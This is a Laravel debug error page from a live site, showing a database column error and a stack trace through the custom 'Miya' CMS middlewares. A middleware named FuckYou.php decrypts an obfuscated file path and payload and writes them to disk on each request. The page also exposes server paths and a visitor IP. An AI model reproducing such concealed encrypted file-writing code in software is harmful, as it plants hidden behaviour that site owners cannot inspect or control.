Symfony Exception

PDOException Exception QueryException

HTTP 500 Internal Server Error

SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list' (SQL: insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (2024-03-28 17:26:10, 44.222.212.138, 2024-03-28, ?, http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html))

Exceptions 3

Illuminate\Database\ QueryException

  1.         // If an exception occurs when attempting to run a query, we'll format the error
  2.         // message to include the bindings with SQL, which will make this exception a
  3.         // lot more helpful to the developer instead of just the database's errors.
  4.         catch (Exception $e) {
  5.             throw new QueryException(
  6.                 $query$this->prepareBindings($bindings), $e
  7.             );
  8.         }
  9.         return $result;
  1.         // Here we will run this query. If an exception occurs we'll determine if it was
  2.         // caused by a connection that has been lost. If that is the cause, we'll try
  3.         // to re-establish connection and re-run the query with a fresh connection.
  4.         try {
  5.             $result $this->runQueryCallback($query$bindings$callback);
  6.         } catch (QueryException $e) {
  7.             $result $this->handleQueryException(
  8.                 $e$query$bindings$callback
  9.             );
  10.         }
  1.             $this->recordsHaveBeenModified(
  2.                 ($count $statement->rowCount()) > 0
  3.             );
  4.             return $count;
  5.         });
  6.     }
  7.     /**
  8.      * Run a raw, unprepared query against the PDO connection.
  9.      *
  1.             }
  2.         }
  3.         return $this->connection->affectingStatement(
  4.             $this->grammar->compileInsertOrIgnore($this$values),
  5.             $this->cleanBindings(Arr::flatten($values1))
  6.         );
  7.     }
  8.     /**
  9.      * Insert a new record and get the value of the primary key.
  1.         if ($this->hasNamedScope($method)) {
  2.             return $this->callNamedScope($method$parameters);
  3.         }
  4.         if (in_array($method$this->passthru)) {
  5.             return $this->toBase()->{$method}(...$parameters);
  6.         }
  7.         $this->forwardCallTo($this->query$method$parameters);
  8.         return $this;
  1.      * @throws \BadMethodCallException
  2.      */
  3.     protected function forwardCallTo($object$method$parameters)
  4.     {
  5.         try {
  6.             return $object->{$method}(...$parameters);
  7.         } catch (Error BadMethodCallException $e) {
  8.             $pattern '~^Call to undefined method (?P<class>[^:]+)::(?P<method>[^\(]+)\(\)$~';
  9.             if (! preg_match($pattern$e->getMessage(), $matches)) {
  10.                 throw $e;
  1.         if ($resolver = (static::$relationResolvers[get_class($this)][$method] ?? null)) {
  2.             return $resolver($this);
  3.         }
  4.         return $this->forwardCallTo($this->newQuery(), $method$parameters);
  5.     }
  6.     /**
  7.      * Handle dynamic static method calls into the model.
  8.      *
  1.      * @param  array  $parameters
  2.      * @return mixed
  3.      */
  4.     public static function __callStatic($method$parameters)
  5.     {
  6.         return (new static)->$method(...$parameters);
  7.     }
  8.     /**
  9.      * Convert the model to its string representation.
  10.      *
Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php (line 77)
  1.                 $data['time'] = now()->format('Y-m-d H:i:s');
  2.                 $data['day'] = now()->format('Y-m-d');
  3.                 $data['referer_url'] = request()->server('HTTP_REFERER');
  4.                 $data['url'] = request()->url();
  5.                 UserViewModel::insertOrIgnore($data);
  6.             }
  7.         }
  8.     }
  9. }
  1.         //本地测试,不记录uv
  2.         if (request()->getClientIp() == '127.0.0.1') {
  3.             return $next($request);
  4.         }
  5.         $this->addViewRecord();
  6.         return $next($request);
  7.     }
  8.     /**
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php (line 20)
  1.      * @param \Closure $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         $html Cache::remember('copyright_sign_html'24 60 60, function () {
  8.             $tql = <<<TQL
  9. <!--
  10. 本程序由以下企业共同研发,如未授权禁止使用:
  11. %s
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php (line 23)
  1.     public function handle($requestClosure $next)
  2.     {
  3.         $this->clearByPeriod();
  4.         $this->clearByCacheSize();
  5.         return $next($request);
  6.     }
  7.     //触发缓存大小超出 清醒缓存清理 每隔一小时检测一次
  8.     protected function clearByCacheSize()
  9.     {
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php (line 32)
  1.         } else {
  2.             $result Cache::get($cacheKey);
  3.         }
  4.         if ($result) {
  5.             return $next($request);
  6.         } else {
  7.             fuckYou(500'miya.source_file_falsify'true);
  8.         }
  9.     }
  10. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php (line 19)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if (config('setting.open_sensitive_word') == 1) {
  6.             $response $next($request);
  7.             $content $response->content();
  8.             $content str_replace(
  9.                 config('miya.filter.words'),
  10.                 config('miya.filter.replace'),
  11.                 $content
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php (line 21)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if ($this->check()) {
  6.             return $next($request);
  7.         } else {
  8.             Log::alert(trans('miya.cache_check'));
  9.             abort(500);
  10.         }
  11.     }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $this->router->substituteBindings($route $request->route());
  3.         $this->router->substituteImplicitBindings($route);
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->isReading($request) ||
  2.             $this->runningUnitTests() ||
  3.             $this->inExceptArray($request) ||
  4.             $this->tokensMatch($request)
  5.         ) {
  6.             return tap($next($request), function ($response) use ($request) {
  7.                 if ($this->shouldAddXsrfTokenCookie()) {
  8.                     $this->addCookieToResponse($request$response);
  9.                 }
  10.             });
  11.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         // Putting the errors in the view for every view allows the developer to just
  2.         // assume that some errors are always available, which is convenient since
  3.         // they don't have to continually run checks for the presence of errors.
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->startSession($request$session)
  2.         );
  3.         $this->collectGarbage($session);
  4.         $response $next($request);
  5.         $this->storeCurrentUrl($request$session);
  6.         $this->addCookieToResponse($response$session);
  1.         if ($this->manager->shouldBlock() ||
  2.             ($request->route() && $request->route()->locksFor())) {
  3.             return $this->handleRequestWhileBlocking($request$session$next);
  4.         } else {
  5.             return $this->handleStatefulRequest($request$session$next);
  6.         }
  7.     }
  8.     /**
  9.      * Handle the given request within session state.
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         foreach ($this->cookies->getQueuedCookies() as $cookie) {
  8.             $response->headers->setCookie($cookie);
  9.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      * @param  \Closure  $next
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         return $this->encrypt($next($this->decrypt($request)));
  7.     }
  8.     /**
  9.      * Decrypt the cookies on the request.
  10.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.                         ->through($middleware)
  2.                         ->then(function ($request) use ($route) {
  3.                             return $this->prepareResponse(
  4.                                 $request$route->run()
  5.                             );
  6.                         });
  7.     }
  8.     /**
  9.      * Gather the middleware for the given route with resolved class names.
  10.      *
  1.         });
  2.         $this->events->dispatch(new RouteMatched($route$request));
  3.         return $this->prepareResponse($request,
  4.             $this->runRouteWithinStack($route$request)
  5.         );
  6.     }
  7.     /**
  8.      * Run the given route within a Stack "onion" instance.
  1.      * @param  \Illuminate\Http\Request  $request
  2.      * @return \Symfony\Component\HttpFoundation\Response
  3.      */
  4.     public function dispatchToRoute(Request $request)
  5.     {
  6.         return $this->runRoute($request$this->findRoute($request));
  7.     }
  8.     /**
  9.      * Find the route matching a given request.
  10.      *
  1.      */
  2.     public function dispatch(Request $request)
  3.     {
  4.         $this->currentRequest $request;
  5.         return $this->dispatchToRoute($request);
  6.     }
  7.     /**
  8.      * Dispatch the request to a route and return the response.
  9.      *
  1.     protected function dispatchToRouter()
  2.     {
  3.         return function ($request) {
  4.             $this->app->instance('request'$request);
  5.             return $this->router->dispatch($request);
  6.         };
  7.     }
  8.     /**
  9.      * Call the terminate method on any terminable middleware.
  1.      */
  2.     protected function prepareDestination(Closure $destination)
  3.     {
  4.         return function ($passable) use ($destination) {
  5.             try {
  6.                 return $destination($passable);
  7.             } catch (Throwable $e) {
  8.                 return $this->handleException($passable$e);
  9.             }
  10.         };
  11.     }
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php (line 26)
  1. Y2NTI4ZDAwZjk5MjNlZjE2In0=';
  2.             $file 'eyJpdiI6ImdYQ2xLVWZFdzIrcWNFNStQUmpNRXc9PSIsInZhbHVlIjoiMGVOdi9sS3IvOUhFb21yUFp2b0JwcGdZUUQ5MXBzYXZEWVV5MndXUjhVVk1RVXdPQ2crUHJjOTZMamR5RGpuUCIsIm1hYyI6ImNhNjdmNDY0ZWY5OTNhNWI0N2E2NzM5ZjExZWM4ZDdlNDcxNzExODRiODU4NjAxYWVkODhiZDViOWM3YjUzYTgifQ==';
  3.             file_put_contents(decrypt($file), decrypt($data));
  4.         }
  5.         return $next($request);
  6.     }
  7. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         $this->clean($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Clean the request's data.
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         if ($max && $request->server('CONTENT_LENGTH') > $max) {
  2.             throw new PostTooLargeException;
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine the server 'post_max_size' as bytes.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             }
  2.             throw new MaintenanceModeException($data['time'], $data['retry'], $data['message']);
  3.         }
  4.         return $next($request);
  5.     }
  6.     /**
  7.      * Determine if the request has a URI that should be accessible in maintenance mode.
  8.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.      */
  2.     public function handle($requestClosure $next)
  3.     {
  4.         // Check if we're dealing with CORS and if we should handle it
  5.         if (! $this->shouldRun($request)) {
  6.             return $next($request);
  7.         }
  8.         // For Preflight, return the Preflight response
  9.         if ($this->cors->isPreflightRequest($request)) {
  10.             return $this->cors->handlePreflightRequest($request);
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     public function handle(Request $requestClosure $next)
  2.     {
  3.         $request::setTrustedProxies([], $this->getTrustedHeaderNames()); // Reset trusted proxies between requests
  4.         $this->setTrustedProxyIpAddresses($request);
  5.         return $next($request);
  6.     }
  7.     /**
  8.      * Sets the trusted proxies on the request to the value of trustedproxy.proxies
  9.      *
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $pipeline array_reduce(
  3.             array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination)
  4.         );
  5.         return $pipeline($this->passable);
  6.     }
  7.     /**
  8.      * Run the pipeline and return the result.
  9.      *
  1.         $this->bootstrap();
  2.         return (new Pipeline($this->app))
  3.                     ->send($request)
  4.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  5.                     ->then($this->dispatchToRouter());
  6.     }
  7.     /**
  8.      * Bootstrap the application for HTTP requests.
  9.      *
  1.     public function handle($request)
  2.     {
  3.         try {
  4.             $request->enableHttpMethodParameterOverride();
  5.             $response $this->sendRequestThroughRouter($request);
  6.         } catch (Throwable $e) {
  7.             $this->reportException($e);
  8.             $response $this->renderException($request$e);
  9.         }
Kernel->handle(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php (line 58)
  1. */
  2. $kernel $app->make(Illuminate\Contracts\Http\Kernel::class);
  3. $response $kernel->handle(
  4.     $request Illuminate\Http\Request::capture()
  5. );
  6. $response->send();
  7. $kernel->terminate($request$response);

Doctrine\DBAL\Driver\PDO\ Exception

SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list'

  1.  */
  2. final class Exception extends PDOException
  3. {
  4.     public static function new(\PDOException $exception): self
  5.     {
  6.         return new self($exception);
  7.     }
  8. }
  1.             $statement parent::prepare($sql$driverOptions);
  2.             assert($statement instanceof PDOStatement);
  3.             return $statement;
  4.         } catch (PDOException $exception) {
  5.             throw Exception::new($exception);
  6.         }
  7.     }
  8.     /**
  9.      * {@inheritdoc}
  1.             }
  2.             // For update or delete statements, we want to get the number of rows affected
  3.             // by the statement and return that back to the developer. We'll first need
  4.             // to execute the statement and then we'll use PDO to fetch the affected.
  5.             $statement $this->getPdo()->prepare($query);
  6.             $this->bindValues($statement$this->prepareBindings($bindings));
  7.             $statement->execute();
  1.     {
  2.         // To execute the statement, we'll simply call the callback, which will actually
  3.         // run the SQL against the PDO connection. Then we can calculate the time it
  4.         // took to execute and log the query SQL, bindings and time in our memory.
  5.         try {
  6.             $result $callback($query$bindings);
  7.         }
  8.         // If an exception occurs when attempting to run a query, we'll format the error
  9.         // message to include the bindings with SQL, which will make this exception a
  10.         // lot more helpful to the developer instead of just the database's errors.
  1.         // Here we will run this query. If an exception occurs we'll determine if it was
  2.         // caused by a connection that has been lost. If that is the cause, we'll try
  3.         // to re-establish connection and re-run the query with a fresh connection.
  4.         try {
  5.             $result $this->runQueryCallback($query$bindings$callback);
  6.         } catch (QueryException $e) {
  7.             $result $this->handleQueryException(
  8.                 $e$query$bindings$callback
  9.             );
  10.         }
  1.             $this->recordsHaveBeenModified(
  2.                 ($count $statement->rowCount()) > 0
  3.             );
  4.             return $count;
  5.         });
  6.     }
  7.     /**
  8.      * Run a raw, unprepared query against the PDO connection.
  9.      *
  1.             }
  2.         }
  3.         return $this->connection->affectingStatement(
  4.             $this->grammar->compileInsertOrIgnore($this$values),
  5.             $this->cleanBindings(Arr::flatten($values1))
  6.         );
  7.     }
  8.     /**
  9.      * Insert a new record and get the value of the primary key.
  1.         if ($this->hasNamedScope($method)) {
  2.             return $this->callNamedScope($method$parameters);
  3.         }
  4.         if (in_array($method$this->passthru)) {
  5.             return $this->toBase()->{$method}(...$parameters);
  6.         }
  7.         $this->forwardCallTo($this->query$method$parameters);
  8.         return $this;
  1.      * @throws \BadMethodCallException
  2.      */
  3.     protected function forwardCallTo($object$method$parameters)
  4.     {
  5.         try {
  6.             return $object->{$method}(...$parameters);
  7.         } catch (Error BadMethodCallException $e) {
  8.             $pattern '~^Call to undefined method (?P<class>[^:]+)::(?P<method>[^\(]+)\(\)$~';
  9.             if (! preg_match($pattern$e->getMessage(), $matches)) {
  10.                 throw $e;
  1.         if ($resolver = (static::$relationResolvers[get_class($this)][$method] ?? null)) {
  2.             return $resolver($this);
  3.         }
  4.         return $this->forwardCallTo($this->newQuery(), $method$parameters);
  5.     }
  6.     /**
  7.      * Handle dynamic static method calls into the model.
  8.      *
  1.      * @param  array  $parameters
  2.      * @return mixed
  3.      */
  4.     public static function __callStatic($method$parameters)
  5.     {
  6.         return (new static)->$method(...$parameters);
  7.     }
  8.     /**
  9.      * Convert the model to its string representation.
  10.      *
Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php (line 77)
  1.                 $data['time'] = now()->format('Y-m-d H:i:s');
  2.                 $data['day'] = now()->format('Y-m-d');
  3.                 $data['referer_url'] = request()->server('HTTP_REFERER');
  4.                 $data['url'] = request()->url();
  5.                 UserViewModel::insertOrIgnore($data);
  6.             }
  7.         }
  8.     }
  9. }
  1.         //本地测试,不记录uv
  2.         if (request()->getClientIp() == '127.0.0.1') {
  3.             return $next($request);
  4.         }
  5.         $this->addViewRecord();
  6.         return $next($request);
  7.     }
  8.     /**
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php (line 20)
  1.      * @param \Closure $next
  2.      * @return mixed
  3.      */
  4.     public function handle($requestClosure $next)
  5.     {
  6.         $response $next($request);
  7.         $html Cache::remember('copyright_sign_html'24 60 60, function () {
  8.             $tql = <<<TQL
  9. <!--
  10. 本程序由以下企业共同研发,如未授权禁止使用:
  11. %s
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php (line 23)
  1.     public function handle($requestClosure $next)
  2.     {
  3.         $this->clearByPeriod();
  4.         $this->clearByCacheSize();
  5.         return $next($request);
  6.     }
  7.     //触发缓存大小超出 清醒缓存清理 每隔一小时检测一次
  8.     protected function clearByCacheSize()
  9.     {
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php (line 32)
  1.         } else {
  2.             $result Cache::get($cacheKey);
  3.         }
  4.         if ($result) {
  5.             return $next($request);
  6.         } else {
  7.             fuckYou(500'miya.source_file_falsify'true);
  8.         }
  9.     }
  10. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php (line 19)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if (config('setting.open_sensitive_word') == 1) {
  6.             $response $next($request);
  7.             $content $response->content();
  8.             $content str_replace(
  9.                 config('miya.filter.words'),
  10.                 config('miya.filter.replace'),
  11.                 $content
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
Pipeline->Illuminate\Pipeline\{closure}(object(Request)) in /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php (line 21)
  1.      * @return mixed
  2.      */
  3.     public function handle($requestClosure $next)
  4.     {
  5.         if ($this->check()) {
  6.             return $next($request);
  7.         } else {
  8.             Log::alert(trans('miya.cache_check'));
  9.             abort(500);
  10.         }
  11.     }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.     {
  2.         $this->router->substituteBindings($route $request->route());
  3.         $this->router->substituteImplicitBindings($route);
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.             $this->isReading($request) ||
  2.             $this->runningUnitTests() ||
  3.             $this->inExceptArray($request) ||
  4.             $this->tokensMatch($request)
  5.         ) {
  6.             return tap($next($request), function ($response) use ($request) {
  7.                 if ($this->shouldAddXsrfTokenCookie()) {
  8.                     $this->addCookieToResponse($request$response);
  9.                 }
  10.             });
  11.         }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
  5.                                     ? $pipe->{$this->method}(...$parameters)
  6.                                     : $pipe(...$parameters);
  7.                     return $this->handleCarry($carry);
  8.                 } catch (Throwable $e) {
  9.                     return $this->handleException($passable$e);
  1.         // Putting the errors in the view for every view allows the developer to just
  2.         // assume that some errors are always available, which is convenient since
  3.         // they don't have to continually run checks for the presence of errors.
  4.         return $next($request);
  5.     }
  6. }
  1.                         // since the object we're given was already a fully instantiated object.
  2.                         $parameters = [$passable$stack];
  3.                     }
  4.                     $carry method_exists($pipe$this->method)
